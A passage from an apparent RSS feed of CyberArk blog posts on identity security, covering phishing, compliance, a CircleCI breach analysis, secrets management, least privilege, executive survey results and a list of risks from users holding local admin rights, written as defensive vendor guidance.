With a centralized solution that works with native cloud secrets managers instead, security and developers can balance their needs and deliver secure, well-built applications for their organizations. The right solution can help security teams enhance secrets management for AWS-based applications and help mitigate risk.

To learn more, read the analyst report from ESG’s Jack L. Poller, “Enhancing Secrets Management for AWS Applications.

]]>
Why the Phishing Blame Game Misses the Point https://www.cyberark.com/blog/why-the-phishing-blame-game-misses-the-point/ Wed, 22 Feb 2023 06:23:43 +0000 https://www.cyberark.com/?p=140745 phishing and cyber crime concept. fishing hook on computer keyboard

Phishing is a big problem that’s getting even bigger as cybercriminals find new ways to hook employees. With threats coming from every direction – emails on company computers, text and voice messages on mobile devices and in personal communications channels, malicious typosquatting sites, phony marketing QR codes and more – it’s only a matter of time before someone trips up and opens or clicks on something they shouldn’t. When they do, and that phishing attack leads to a damaging data breach, who’s at fault?

The Phishing “Click This, Not That” Contradiction

In the physical world’s airports, train stations and other high-traffic areas, law enforcement posts signs warning people to watch out for suspicious behavior. While public vigilance is critical, citizens aren’t expected to identify shoplifters, challenge those who run red lights or stop unauthorized visitors from entering buildings.

Yet, in the digital world, workforce users (usually outside the IT security department) have become frontline phishing gatekeepers. And they’re flooded with contradictory guidance of “click this, not that.” Think of the HR executive whose job involves reviewing resumes that arrive daily through email, web applications and social media. Or the employee who receives regular emails, supposedly from IT, instructing them to click on links to review company policies and download required software updates. Is it reasonable to expect these people to assess every attachment and link, detecting the malicious from the legitimate with 100% accuracy, 100% of the time? And when a user does fall for a phishing attempt and realizes it too late, are they empowered to report it, or do they try to cover it up, embarrassed or afraid of potential consequences?

Phishing Awareness is Just the Start

Don’t get me wrong. Security is a team game everyone must play, and phishing education is critical. In fact, security leaders identify security awareness training as one of the top three most effective components of a defense-in-depth strategy to combat ransomware. A large body of research shows that regular phishing education can make a positive difference and promote the team game mentality. Teaching users about the real-world ramifications of risky behavior, such as forwarding personal emails to work accounts, can also help dispel the myth that security teams are like all-powerful seatbelts – there to protect people from harm, no matter how fast they’re driving. But phishing education isn’t enough on its own, and phishing prevention strategies that center on human responsibility are unlikely to succeed.

The UK National Cybersecurity Center (NCSC) recently published a post that piqued my interest, asking, “What would we do differently if we were actually encouraging users to click links without fear?” It’s a theoretical question, of course, but it forces an important perspective shift.

What Would It Take to Click Without Fear?

Cyberintruders are constantly innovating and will always find ways to get inside environments. This is one reason Zero Trust has gained such momentum. It’s built on the assumption that any identity or endpoint could be compromised. Because of this, security must start from an assume breach mindset, which recognizes that all users – whether they work in HR, marketing, finance, development or even the IT department – may get phished.

Instead of trying to control every click, the focus stays on controlling what’s actually controllable. For instance, by enforcing strong authentication everywhere, practicing good credential hygiene and consistently following the principle of least privilege (for both human and non-human identities) to help prevent credential theft. Or by implementing allow-listing and application control to help mitigate malicious downloads.

This security approach isn’t about placing blame; it’s about emphasizing awareness AND putting the right layered defenses in place to find and stop attackers quickly. To that end, the NCSC offers helpful defense-in-depth guidance aimed at preventing phishing email delivery, initial code execution and future harm that’s worth a read.

Enough with the Phishing Blame Game

Humans are biologically wired to blame. When bad things happen to us, we instinctively look for reasons beyond ourselves. Even as onlookers, we crave that “who done it” closure. It’s why major breach reports spark waves of speculation and why human error is a common corporate explanation. Yet while the phishing blame game may help us feel better, we’re missing (or ignoring) the more significant point. That is, fault refers to responsibility; responsibility is rooted in trust; and inherent trust – in anyone or anything – must be stripped entirely from the modern security equation.

Identity Security, centered on intelligent privilege controls, lays the foundation for Zero Trust by limiting access to those who need it and only granting the minimum privilege for the task in question. Read our whitepaper, “Zero Trust’s Evolution,” to learn how Identity Security can help today’s digital and cloud-based enterprises enable Zero Trust while achieving measurable risk reduction, operational efficiency and other bottom-line business outcomes.

 

David Higgins is a senior director in the CyberArk Field Technology Office

]]>
How Automated Identity Management Can Help Solve the Compliance Puzzle https://www.cyberark.com/blog/how-automated-identity-management-can-help-solve-the-compliance-puzzle/ Fri, 17 Feb 2023 20:29:03 +0000 https://www.cyberark.com/?p=140657 Word jumble graphic of regulation acronyms

Have you ever received a puzzle as a gift from a well-intentioned friend? They likely thought something along the lines of, “Hey, this person’s into solving problems — I bet they’d love putting together this bad boy on a rainy day.”

The sentiment was spot-on. Puzzles are your thing. But then you see the words “7,000 PIECES!” on the box and think to yourself:

“How… When… In what reality will I be able to solve this puzzle?” Simultaneously, your phone blows up with work emails, your contractor says the furnace broke — and your kids/dogs/both have made a giant mess in the kitchen.

This scenario reflects what it must be like for an IT or security team member to take on the compliance puzzle, as identity management becomes more complex.

Ensuring and demonstrating compliance is a struggle for many organizations. In addition to defending against attacks, IT and security teams are often on point to manage one or more of the following areas:

  • Ensuring transparency for internal and external audits
  • Meeting requirements in complex industry and government regulations like PCI DSS, HIPAA and SWIFT
  • Demonstrating compliance and producing comprehensive reports and/or analytics

 

As Identity Management Challenges Mount, the Stakes of Compliance Get Higher

The work involved in adhering to rules, meeting reporting requirements and avoiding penalties seemingly never stops growing. And there’s always *what’s coming next*…

So, what’s on the rise now? To start, regulations are expanding globally.

World map of regulation mandates

Also on the rise, the costs of getting compliance wrong.

Graphic of mandates and fines

Meanwhile, securing your users’ identities — which includes granting, certifying and revoking access — is essential. But it’s not easy. You’re protecting the enterprise at a time when everything is surging in concert and complexity.

Graphic of increasing organizational size

 

As the Puzzle Pieces Shuffle, Malicious Actors Look for Vulnerabilities to Exploit

Attackers are fully aware of the challenges IT and security teams are facing. They’re on the lookout for the troublesome trio of unchecked access, orphaned accounts and privilege creep — all of which can happen if an organization lacks strong controls for managing access-related compliance reviews and certifications.

Chart of employee churn

Consider the far-reaching effects of a breach stemming from a lack of consistent identity management processes. In this hypothetical scenario, let’s say an attacker exploited the account of a user who had accumulated too much access to sensitive resources. First and foremost, you’d need to deal with the impact of the breach itself — in this case, data theft involving customer information. But you’d also be facing ripple effects that could harm your enterprise’s operations.

No doubt, regulatory fines can be a huge impediment to your plans for growth and transformation. But how can an enterprise recoup from the impact of damaged trust — among its customers, partners, employees and any number of other key stakeholders?

Amid these pressures, it’s no wonder that most enterprise leaders admit that they lack the confidence to solve the compliance puzzle. It’s staring them in the face daily, not unlike the half-completed jigsaw puzzles that mock us from their arrogant perch atop so many coffee tables.

Graphic of compliance puzzle

But solve the puzzle we must.

The million-to-gazillion dollar question: How do you gain the visibility and control you need to ensure that the evolving nature of privilege doesn’t put your organization in jeopardy? This applies to a wide range of identities and concerns, including:

  • The potentially risky actions employees can take within applications containing sensitive data.
  • The entitlements your privileged users have to access safes and privileged accounts.
  • he authorizations and permissions your developers and operations teams have in cloud environments.

 

Six Identity Management Best Practices to Help You Solve the Compliance Puzzle

Here are some best practices for strengthening compliance and auditing capabilities:

  1. Create a unified view of who has privileges and authorization to what resources, with capabilities for discovering, adjusting, certifying and revoking access.
  2. Integrate access certification processes with your PAM program, and continuously discover who has access to what safes and privileged accounts across the enterprise.
  3. Automate governance processes to ensure checks and balances — for example, continuously enforcing least privilege with reviews and certifications scheduled for recurring dates.
  4. Leverage contextual data about users so that managers can take risk scores into account before making access decisions.
  5. Empower your team and auditors with analytics and reporting capabilities to help identify potential compliance issues, offer detailed audit trails and allow for custom reports.
  6. Integrate compliance tools with your overall Identity Security framework, which can help prevent siloes and ensure compliance of all identities, including privileged or administrative accounts.

Learn how CyberArk solutions such as CyberArk Identity Compliance can help you gain the capabilities, controls – and confidence – to solve the global compliance puzzle.

]]>
Deconstructing Identity Security https://www.cyberark.com/blog/deconstructing-identity-security/ Mon, 13 Feb 2023 19:00:17 +0000 https://www.cyberark.com/?p=140088

Most companies now recognize the serious and insidious nature of cybersecurity threats. But many fail to grasp that the digital transformation, remote work, automation and cloud migration activities of the last few years have turbocharged the number of identities seeking access to data and critical business systems. This surge in identities has exponentially increased the likelihood of cyberattacks, undercutting the effectiveness of traditional identity and access management (IAM) paradigms.

In the modern enterprise, nearly every employee has multiple identities on the network and uses several devices to access business systems. According to the CyberArk 2022 Identity Security Threat Landscape Report, the average staff member accesses more than 30 applications and accounts, requiring them to remember and manage countless passwords and repeatedly authenticate themselves to systems and applications. These employees often collaborate with third-party partners who also access sensitive company data and assets to do their jobs. At the same time, machine identities outnumber human identities by a factor of 45:1, the CyberArk report found.

According to the latest Verizon Data Breach Investigations Report, 80% of Basic Web Application Attacks (BWAA) start with compromised credentials. Identity has become the latest high-value target in the cybersecurity battleground. Yet the proliferation of identities has made it difficult for security professionals to strike the right balance between safeguards and speed to do what’s necessary to protect the complex web of endpoints, devices, cloud workflows and SaaS solutions. And that’s without making it overly difficult for the enterprise or leaving gaps that bad actors can easily exploit.

Most traditional IAM tools were not built with a security-first approach, nor were they designed to manage the broad number of human, application and machine identities that exist across on-premises data centers, SaaS environments and hybrid, multi-cloud infrastructure. This identity challenge is compounded by using multiple siloed tools that create management headaches due to a lack of automation and poor visibility. Given the stakes, it’s time for organizations to recalibrate and make identity the centerpiece of their security strategies.

A New Vision for Identity Management

So what’s the best way to secure all these types of identities within an organization? It starts with a risk-aligned Identity Security approach that embraces the core concepts of Zero Trust. This includes acknowledging that attacks will occur and enforcing intelligent privilege controls consistently to secure access for all identities – human and machine – and flexibly automate the identity lifecycle. By layering these with continuous threat detection and prevention capabilities, organizations are empowered to spot threats earlier and stop identity-driven attacks in motion. The ultimate goal is to enable users with quick and secure access to necessary resources, while trusting nothing and verifying everything behind the scenes.

The modern version of Identity Security rests on four pillars:

Modern Identity Security Defined

To get a picture of how Identity Security might work in the real world, consider a DevOps specialist who is regularly accessing highly sensitive CI/CD resources and tools with the help of a bot that takes care of some of the more mundane housekeeping work. With an Identity Security approach, both the DevOps specialist and the bot (a machine identity) are covered by intelligent privilege controls, allowing them entry to the necessary cloud workspace, but within the context of minimal required access for the least amount of time necessary. Say that developer eventually leaves the position. A modern Identity Security platform with flexible automation and orchestration will automatically shut off access and permissions at just the right time, while the bot retains access and can be redeployed to a new team member.

Identity Security Best Practices

With the basics in place, there are several Identity Security best practices to consider. Among them:

  • Security starts at the front door. Different types of users need access to various resources, so Identity Security must start at the endpoint. Embrace enabling controls like adaptive multifactor authentication (MFA) for endpoints and continuous authentication so if a user decides to elevate access to launch an application, the proper security controls will do their thing. Beyond least privilege and application control, look for solutions that support policy-based, audited just-in-time elevation sessions, credential defense, workforce password management and ransomware protection, among other capabilities.
  • Don’t overlook the cloud. The cloud ushers in many Identity Security challenges, including misconfigurations and over-permissioned accounts. Look for platforms that can detect and remove excessive permissions, provide actionable remediation and promote just-in-time privileged access.
  • Remember the machine challenge. Centralized secrets management can help remove embedded API keys and secrets from applications and automation tools and help drive authentication across a hybrid, multi-cloud environment.

Centered on intelligent privilege controls, Identity Security is the next evolution of protection, providing a holistic and flexible framework that keeps companies focused on business outcomes and a step ahead of adversaries.

Chris Maroun is a senior director in the CyberArk Field Technology Office.

]]>
Udi Mokady to Step into Executive Chair Role and Matt Cohen to Become CEO https://www.cyberark.com/blog/udi-mokady-steps-into-executive-chair-role-and-matt-cohen-to-become-ceo/ Thu, 09 Feb 2023 12:02:35 +0000 https://www.cyberark.com/?p=140058

Today, CyberArk announced that our founder and CEO Udi Mokady will step into the role of Executive Chairman and our Chief Operating Officer, Matt Cohen, will become CyberArk’s CEO, effective April 3, 2023. Together, Udi and Matt make a great team and we’re excited for this next chapter in CyberArk’s journey.

With a powerful combination of the best people, an amazing culture, and the industry’s leading platform for Identity Security, our future is bright and we can’t wait for what’s next.  Hear directly from Udi and Matt on this important announcement.

]]>
Post-CircleCI Breach, Focus on Identity Security Strategy https://www.cyberark.com/blog/post-circleci-breach-focus-on-identity-security-strategy/ Tue, 07 Feb 2023 22:27:22 +0000 https://www.cyberark.com/?p=139974 Post-CircleCI Breach, Focus on Identity Security Strategy

When news of the recent CircleCI breach broke, developers everywhere scrambled to rotate tokens and remove hardcoded secrets stored in the popular CI/CD platform to minimize their exposure. Now that the dust has settled and more details are available, we’re reexamining the CircleCI attack chain to highlight the importance of a holistic Identity Security strategy in thwarting future damaging attacks.

Analyzing the CircleCI Identity Attack Chain

1. Infect an Employee’s Endpoint Device

The laptop of a CircleCI engineer – an employee with privileged access rights – was infected with malware, which was not detected by the company’s antivirus software.

Learning: Mitigating the risk of social engineering and phishing attacks while closing other endpoint security gaps requires a strong mix of integrated tools and processes – there isn’t one tool that can do it all. Endpoint privilege management is one foundational control that every organization needs to consider carefully. Removing local admin rights, replacing them with controlled just-in-time elevation and enforcing least privilege can help ensure that an honest mistake does not lead to downloading and installing malware in the first place.

2. Steal Employee Session Tokens

An unauthorized third party used the malware to steal the employee’s single sign-on session tokens. By keeping the employee’s web sessions open and active, the attacker successfully bypassed multifactor authentication (MFA) safeguards in place.

Learning: Stealing session tokens, cookies and other types of post-MFA tokens is an increasingly popular technique because it enables attackers to bypass authentication and authorization prompts. Once a legitimate user has authenticated using MFA, that token or cookie is created on the endpoint as a piece of trust and an attacker can use it for later access. This technique is also relatively easy to pull off. While many attacks (including this CircleCI incident) require elevated privileges to install malicious software on an endpoint, token and cookie hijacking can be accomplished without them.

As more companies embrace adaptive MFA controls to maintain balance between security and simpler and smoother user experience, token and cookie hijacking will continue to gain traction as these techniques provide a way of bypassing MFA measures. To mitigate risk, MFA systems should be strengthened with endpoint privilege security controls that detect and block credential theft – including post-MFA token theft – at the start of an attack before they’re used to access critical business and cloud services. An all-encompassing approach will also give security teams a flexible, yet consistent way to implement privilege and application control. Incorporating capabilities to monitor and audit end-user activity in designated web applications can also help secure user sessions from threats originating on the endpoint and curb prohibited data exfiltration by workforce users, such as downloading or copying sensitive files.

3. Establish Persistence and Move Laterally

By using the stolen tokens, the attackers were able to impersonate the CircleCI engineer to move laterally and vertically through the network and establish persistence. Eventually, the attacker was able to gain access to a subset of the company’s production systems.

Learning: According to CircleCI’s investigation, the attacker spent a few days conducting reconnaissance before stealing data. When organizations have continuous threat detection capabilities in place, dwell times like this represent a big opportunity to detect and block attacks from causing damage. And by applying AI-based user behavior analytics, one careless move (such as accessing the network from an unusual location or time of day while doing recon) could be all it takes to unmask the attacker impersonating a legitimate privileged user.

4. Gather and Exfiltrate Data

According to CircleCI, “Because the targeted employee had privileges to generate production access tokens as part of the employee’s regular duties, the unauthorized third party was able to access and exfiltrate data from a subset of databases and stores, including customer environment variables, tokens, and keys.” Customers were urged to rotate “any and all secrets” stored in CircleCI, review their own system logs and watch out for suspicious activity in integrated SaaS applications and public cloud environments.

Learning: For most organizations, manually rotating every secret isn’t simple exercise. For one thing, there are TONS of secrets out there. More precisely, there are 45 non-human identities for every one human identity, and 68% of them use secrets and other credentials to access sensitive corporate resources. Second, these secrets are often hardcoded to save time and effort and can be found in source code in private or even public repositories (e.g., on GitHub), scripts, configuration files and CI/CD pipeline code. But after a cyber incident, for example in a supply chain, when there’s an urgent need to rotate these secrets, developers often end up losing more time manually hunting them down to rotate. Meanwhile, attackers actively target hardcoded secrets to gain high-level access and escalate privileges, as seen in last year’s Uber breach.

The CircleCI breach is just one of many recent reminders that intelligent privilege controls must cover every single identity – not just those linked to people. Non-human and machine identities – and the secrets and other credentials they use must be managed in a similar fashion. A centralized secrets management system makes it possible to authenticate, authorize and audit non-human access, while automatically rotating credentials, when needed, and removing static secrets from all scripts and source code.

A Massive Circle of Impact

The CircleCI breach not only impacted one of the world’s most widely used CI/CD platforms, it also put millions of organizations at risk. By tricking just one employee, the attacker was able to work their way through CircleCI’s corporate IT infrastructure, steal sensitive company data and use hardcoded and unprotected secrets to potentially reach further into customer environments. As a result, CircleCI customers had to pause important work and spend valuable development and DevOps resources updating their own code to mitigate risk and potential exposure.

Protecting your enterprise from future identity-based attacks requires a unified Identity Security strategy that removes silos, enhances visibility and automates time-intensive tasks. Empowered, security teams can enable secure access to all resources – on endpoints, in DevOps pipelines, across cloud environments and everywhere else – to measurably reduce risk and stay one step ahead of threats.

]]>
How to Secure Secrets in Multi-cloud Environments https://www.cyberark.com/blog/secure-secrets-in-multi-cloud-environments/ Thu, 02 Feb 2023 22:05:37 +0000 https://www.cyberark.com/?p=139656 How to Secure Secrets in Multi-cloud Environments

It wasn’t too long ago that using a single cloud for some business operations was cutting-edge technology. Now the cloud is essential for accelerating growth, improving efficiency and remaining competitive. Most organizations have multiple cloud environments deployed, in addition to private cloud and on-premises environments. In fact, in a soon-to-release CyberArk survey, 85% of respondents said they would be using three or more cloud service providers by 2023. And developers are building more and more applications in the cloud – 71% of organizations are developing cloud-native applications, according to the Enterprise Strategy Group (ESG) 2023 Technology Spending Intentions Survey.

Automation, DevOps and the rise of cloud environments have led to an explosion of machine (or non-human) identities. Applications, cloud workloads, containers, services and other automated tasks – they all require machine identities. And there are a lot of them. The CyberArk 2022 Identity Security Threat Landscape Report found that machine identities outnumber human ones by a factor of 45 to 1.

More Clouds + More Non-human Identities = More Secrets

These non-human identities all use accounts, credentials and secrets to access critical systems and resources and do their jobs. And the number of secrets that need to be managed is growing.

All this means there are more secrets than ever for security teams to keep track of, scattered across a variety of environments – public cloud, private cloud and on-premises – all with their different methods for storing, accessing and managing secrets. Each secret is a potential vulnerability, as attackers can use compromised secrets to access critical systems and resources. The 2022 Uber breach is just one recent example, where hard-coded secrets for a privileged access management (PAM) solution were directly embedded and exposed in a PowerShell script the attacker used to gain admin access to all secrets stored within their system

This becomes a real headache for security teams to manage as organizations continue down the path of cloud migration and other transformation efforts. Not to mention if applications need to be moved from one environment to another, it can become a time-consuming hassle for development and security teams. And many security teams don’t have the bandwidth to either separately manage secrets in each of the environments and tools where they’re stored or implement and maintain a self-hosted secrets management solution.

That’s where SaaS secrets management comes in.

The Five Benefits of SaaS Secrets Management

A centralized, SaaS-based secrets management solution helps ease a lot of the struggles for both the security and development teams working in hybrid or multi-cloud environments.

  • Reduces vault sprawl. When you’re working in multiple clouds or hybrid environments, the number of separate vaults for credentials and secrets can quickly get overwhelming. Rather than security teams hunting for each vault to rotate and manage passwords and having to bring information from a variety of vaults to create an audit trail, a centralized secrets management solution can give you a single pane of glass in which to work.
  • Enables cloud portability. Part of the beauty of the cloud is that developers can build and deploy applications faster than ever. But by relying on the native secrets management capabilities of the platform the application is built on, you’re locked into using that platform. And that becomes an issue if there comes a time when you need to move an application from one environment to another. With a centralized secrets management solution, you can build applications in whichever cloud platform your developers prefer for that specific use case, and move applications from cloud to cloud or from on-prem to cloud without creating a ton of extra work to manage the secrets used in those applications – no need to rewrite apps for a new cloud.
  • Provides a uniform experience for security and developers. Rather than security teams learning multiple different secrets management platforms (which can take time and extra team members), a centralized solution allows security to enforce policies in a unified manner and only operate in one system. This saves time and money on training (from not having to worry about adding additional staff to support every cloud provider), so security can focus on delivering business value.
  • Automates rotation and other security policies. A SaaS-based, centralized solution means that you can automate formerly manual tasks such as secrets rotation and the application of certain security policies. This save security teams time, especially given the vast number of secrets and identities that need to be rotated on a regular basis across multiple different cloud service providers.
  • Speeds up time-to-value and frees up resources. Having a SaaS-based solution means that you can reap the benefits of the cloud with your secrets management software too. Security teams don’t have to worry about operating and maintaining their own secrets management solution (or multiple solutions), but instead can focus their time and attention on the crucial security tasks they need to complete.

Multiple clouds and hybrid environments don’t need to mean extra work for security teams or developers. Centralizing secrets management with a SaaS-based solution can help ease the way and allow the teams to harness the full power of cloud environments.

]]>
Three Ways to Reinforce Least Privilege with Identity Management https://www.cyberark.com/blog/three-ways-to-reinforce-least-privilege-with-identity-management/ Mon, 30 Jan 2023 17:00:43 +0000 https://www.cyberark.com/?p=139460 Reinforce least privilege with Identity Management

The definition of privilege is changing, and this changes everything.

Identities of all types — not just IT team members, but any employees — are gaining access to sensitive data, infrastructure and systems that today’s attackers can easily exploit. On average, more than 1,500 IT and security decision-makers say over half of their employees have access to sensitive corporate data.

Managing digital identities — from granting, adjusting and revoking authorizations to complying with audits — is essential. But it’s not easy. The number of identities requiring your protection is surging, as your organization’s digital and cloud initiatives grow in scope and scale.

Industry Breakdown: Average Percentage of Workforce Given Access to Sensitive Corporate Data

Meanwhile, you’re under pressure to manage and protect your identities at a time when:

  • Many enterprises are bogged down with time-consuming manual processes, outdated technologies and silos across apps, directory stores and data repositories.
  • As risks increase, so do workloads, hours and stress levels. Meanwhile, economic pressures exacerbate ongoing resource and skills gaps.

To truly enforce least privilege, IT and security teams need controls that cover all types of identities with powerful access — from the IT admins of the world to workforce users with heightened privileges. This means enterprises need to rethink what Identity Management is, and needs to be, from its purpose to its execution.

Securing Identities for the Entire Lifecycle Using Automation and Orchestration

As you know, enforcing least privilege involves not just limiting access overall, but giving users the minimum level of authorizations needed to perform only job-relevant actions – for example in SaaS applications where a risky action could compromise sensitive data.

The problem is that manual, error-prone processes can hinder many organizations from securely managing employees’ identity lifecycles.

Looking at the beginning of the lifecycle, new employees often wait days or weeks to be provisioned with access to the applications, services and IT systems they need. At some point, impatience may encourage workers seek other ways to gain access, including the adoption of shadow IT.

But consider what could happen if an IT or security team member forgets a critical step in a manually executed workflow. For example, if an employee leaves the company, the IT team may need to run through a checklist of applications where they must remove access one at a time by hand.

What’s the risk?

One missed step leaves the door open for threat actors to exploit misprovisioned, overprivileged or orphaned accounts — and attackers do this routinely.

IT and security decision-makers believe accelerated employee churn and turnover have caused security issues

Employees’ start and end dates, while important, are only the bookends for continuous identity lifecycle management. Ensuring least privilege for employees across their entire tenures at your organization requires:

  • Months, years and even decades of tracking and re-assigning privileges per user.
  • Provisioning and deprovisioning access as job roles and systems change — and as applications grow in number.
  • Ensuring the wide range of target applications involved remain in sync.

In an era when privilege is everywhere — including in employees’ ability to take risky actions in business apps containing sensitive data — these Identity Management mainstays call for a new approach.

The reason: most enterprises are stuck in a pattern of manually connecting the dots and scripting integrations between data, applications, events and services. And many companies lack formal procedures or consistent workflows for reassessing, adjusting or revoking users’ access and privileges.

Here are some steps you can take to bring a security-first approach to managing identities from a user’s start date to their last day:

1. Centralize your lifecycle management policies, controls and capabilities, using automated workflows for:

  • Onboarding and offboarding employees.
  • Defining and enforcing each user’s unique roles, responsibilities, access rights and permissions.

This approach can free your team from repetitive, error-prone tasks. Integrating these processes with your trusted HR software enables you to maintain consistency and accuracy between platforms.

2. Federate identities across cloud and on-premises applications and systems, so your team can:

  • Quickly provide access when users need it.
  • Adjust it when roles or risks evolve.
  • Remove it when users leave the enterprise.

Automated workflows can help you prevent privilege creep and orphaned accounts that attackers often exploit to launch attacks, steal data and more.

3. Gain real-time insight into potential risks — and the ability to act on them — based on automated tools that track areas such as:

  • Application usage.
  • Failed login attempts.
  • Unused accounts.
  • External threat data.

This three-part approach gives you a scalable form of visibility and control through automated workflows designed to prevent risky actions by users and breach attempts.

Next Steps: Best Practices for Ensuring Compliance and Extending Privilege Controls to All Identities

In a new Executive POV piece published by CyberArk, I discuss best practices for bolstering your team’s Identity Management capabilities in two additional areas:

  1. Applying a security-first approach to compliance, from managing access-related reviews and certifications to meeting regulators’ auditing requirements
  2. Extending the controls you use for securing privileged users to all identities – for example, protecting employee passwords with vault storage and secure sharing

You can read the full piece here: Reinforce Least Privilege by Rethinking Identity Management

Gil Rapaport is the general manager for Identity and Access at CyberArk

]]>
Identity Security: Bridging the Executive Confidence/Reality Gap https://www.cyberark.com/blog/identity-security-bridging-the-executive-confidence-reality-gap/ Wed, 25 Jan 2023 15:48:36 +0000 https://www.cyberark.com/?p=139385 Identity Security: Bridging the Executive Confidence/Reality Gap

In recent years, cybersecurity has become a board-level issue resulting in several executives taking greater responsibility in cybersecurity-related decisions. As a result, the CISO is no longer a technical subject matter expert but an executive risk manager who shares a responsibility matrix with the board of directors, CEOs and other executives to make informed risk decisions. At the highest levels, these executives care about the organization’s revenue, mission, risk and costs, leading to strategic questions about assurance, compliance and security practices.

Recent years have highlighted the need for a robust Identity Security strategy to secure the business from modern-day threats and attacks. CyberArk’s upcoming Identity Security State of the Market survey indicates that in 2023, 81% of 1,500 respondents will exponentially increase their spending on Identity Security as part of their cybersecurity budget. This increased investment drives varied perceptions across C-Level executives and all other personnel, including other senior decision makers (VPs/directors/managers) and security practitioners.

Our research finds that C-level executives have an abnormally high degree of confidence in mitigating Identity Security-related risk as opposed to other personnel who are technically astute and aware of the complexities of their IT environments. For example, 69% of the C-level executives believe they are making the correct Identity Security decisions. On the contrary, only 52% of all roles believe the same to be true. This higher confidence of C-level executives was also reflected in their perception of the impact of cybersecurity investment. The chart below highlights this concerning trend across multiple facets of Identity Security.

The survey’s findings reveal a sharp disconnect between the confidence of the C-level executives in their organization’s Identity Security strategy and the actual damage that identity-related cyber incidents can inflict.

Identity Security Confidence Is Not Synonymous With Reality

What’s the proof of this executive overconfidence? Our research indicates that in 2022, 58% of respondents believed they made the right Identity Security decisions. However, this confidence did not necessarily reflect positive outcomes. 63% of the respondents indicated that they suffered at least one successful identity-related attack last year.

Identity Security and the investment vs. implementation gap

This C-level overconfidence could indicate a more significant problem: a lack of understanding of what a robust Identity Security strategy means beyond just investing in tools. Allocating line-item budgets to procure identity-related tools is the first step of a robust Identity Security strategy. Additional measures include integrating those tools, automation and continuous threat detection and response, based on specific business requirements of a given organization.

The Wide-ranging Impact of Identity-based Attacks

Of the 63% of respondents who were victims of an identity-related cyberattack in the last 12 months, 27% have experienced more than one. And the consequences of experiencing a cyberattack are multi-fold. After an attack, the most popular response among respondents was increased investment in cybersecurity technologies and services, which was determined after a thorough gap analysis and risk assessment. Cybersecurity quickly became a board-level discussion if it wasn’t already.

The short-term impact of a successful identity-related cyberattack includes delayed projects due to the significant manpower and time allocated to resolving the issue. On the other hand, products and services are impacted, causing problems like customer experience degradation and potentially lost revenues, compliance fines and extensive audits.

Outcome of identity-related cybersecurity attack

Our research also indicates that insufficient cybersecurity staff and inadequate in-house expertise when it comes to securing identities or mitigating identity-based risks are two major risk factors. The third risk factor – perhaps the most important – is that many organizations lack a specific line-item budget for Identity Security.

Identity Security’s Four Tenets

IDC FutureScape: Worldwide Future of Trust 2023 Predictions states that by 2025, 45% of CEOs, fatigued by security spending without predictable ROI, will demand security metrics and results measurement to assess and validate investments made in their security program. CyberArk believes that this prediction has the potential to materialize sooner, given the rate and sophistication of modern cyberattacks.

The proliferation of identities and endpoints, increased adoption of hybrid and multi-cloud environments and vulnerabilities from inadequately secured identities in the software supply chain are significant causes for concern. 85% of respondents expect to use three or more public cloud service providers in 2023 – and 57% of them have two independent teams responsible for securing identities in the public cloud and on-premises. The CyberArk 2022 Identity Security Threat Landscape Report indicates that respondents use over 70 security vendors on average. As a result, they prefer to procure platform-like “unified controls” from fewer vendors. But a strong Identity Security platform hinges on the four tenets of a robust Identity Security strategy.

In addition to investments in Identity Security tools, C-level executives must regularly seek updates on the state of integration, automation and continuous threat detection and response capabilities to ensure they are well-informed on their organization’s cybersecurity posture related to Identity Security. The following four tenets are foundational to ensuring that the investments adequately deliver on the promise of reduced cyber risk and increased resilience for your organization on an ongoing basis:

  • Identity Security tools span management, privileged controls, governance, authentication and authorization for all human and machine identities.
  • Integration of Identity Security tools across IT and security solutions is a must to secure access to all corporate assets and the entire IT estate.
  • Automation ensures continuous compliance with policies, industry standards and regulations, enabling rapid responses to high-volume routine and anomalous events.
  • Continuous threat detection and response provides organizations with a solid understanding of baseline identity behaviors to better react to anomalous activity.

Do you relate to any of the issues mentioned above? Are you beginning your journey to develop and implement robust Identity Security strategies? If so, it is important to consider comprehensive capabilities from Identity Security vendors that span identity management, access management and privileged access management (PAM) with leadership across these categories.

To read the complete results and analysis, stay tuned for the release of the CyberArk Identity Security State of the Market survey – coming soon.

]]>
Why No User Should Have Local Admin Rights https://www.cyberark.com/blog/why-no-user-should-have-local-admin-rights/ Tue, 24 Jan 2023 14:00:04 +0000 https://www.cyberark.com/?p=139348

The idea of removing local administrator rights from Every. Single. User. across your organization is likely to spark strong reactions. Search popular online forums for the phrase “remove local admin rights” to see exactly what I mean. But hear me out …

Like most security professionals, you recognize the need – and urgency – to remove these powerful privileges from “regular” business users’ endpoints. Local admin rights are like carrots dangling out in the open, ready for cyberattackers to grab and use to move deeper into your network. Plus, typical workforce users don’t need total control of their systems, and they especially don’t need to run arbitrary code with elevated privileges. That’s far too risky.

But eliminating local admin rights completely? What about administrators and database administrators, the help desk, the infrastructure maintenance team and backup operators? They NEED high-level access to do their jobs, and your security team doesn’t have time or resources to manually grant extra privileges on the fly.

All this is true, but it doesn’t mean privileged users must be local admins. I’ll say it again: No user should be a local admin. Full stop. Here are 29 reminders why (and this is by no means an exhaustive list).

A user with local admin rights, or an attacker impersonating the user, can:

  1. Change boot and hardware configurations (enable/disable devices, change CPU and memory voltage and frequencies, etc.)
  2. Modify or delete storage volumes
  3. Radically simplify malware techniques, such as code injection and DLL hijacking
  4. Easily gain persistence on a machine with the registry fully open for analysis and modification
  5. Disable journaling, alter or wipe events
  6. Disable backup agents or modify backup configurations … and wipe any local backup copy while they’re at it
  7. Modify shadow copy settings or copy shadow copy (to exfiltrate previously “deleted” data)
  8. Modify users, add users, add administrative users or hide administrative users from the login menu
  9. Access every user’s data on the machine and change file and folder owners
  10. Encrypt hard drive master boot record (MBR), also known as a 15-second full-disk ransomware encryption
  11. Disable or reconfigure existing endpoint security solutions
  12. Change network settings, add trust zones, set up tunnels or reroute traffic
  13. Change the domain name system (DNS), hijack the DNS or exfiltrate data through DNS requests
  14. Modify browser settings or add browser extensions
  15. Access every secret stored on the machine: In Windows credential providers, in the browser, in Putty, in FileZilla or any other program that stores credentials
  16. Access and modify certificate stores, change trust chains and decrypt any secure communication
  17. Live off the land luxuriously
  18. Access, analyze and modify memory content
  19. Use security services to gain code execution in local security authority server service (LSASS), which can also be used to extract password hashes and Kerberos tickets
  20. Install ANY non-malicious administrative tool and deploy an arsenal of benign tools (that become the “ultimate attacker toolkit” in the wrong hands) without triggering the antivirus
  21. Install cryptominer malware to take over the machine’s resources and use them for illicit cryptocurrency mining
  22. Enable built-in or third-party hardware trackers to locate devices anywhere in the world
  23. Bypass and/or disable user access control (UAC)
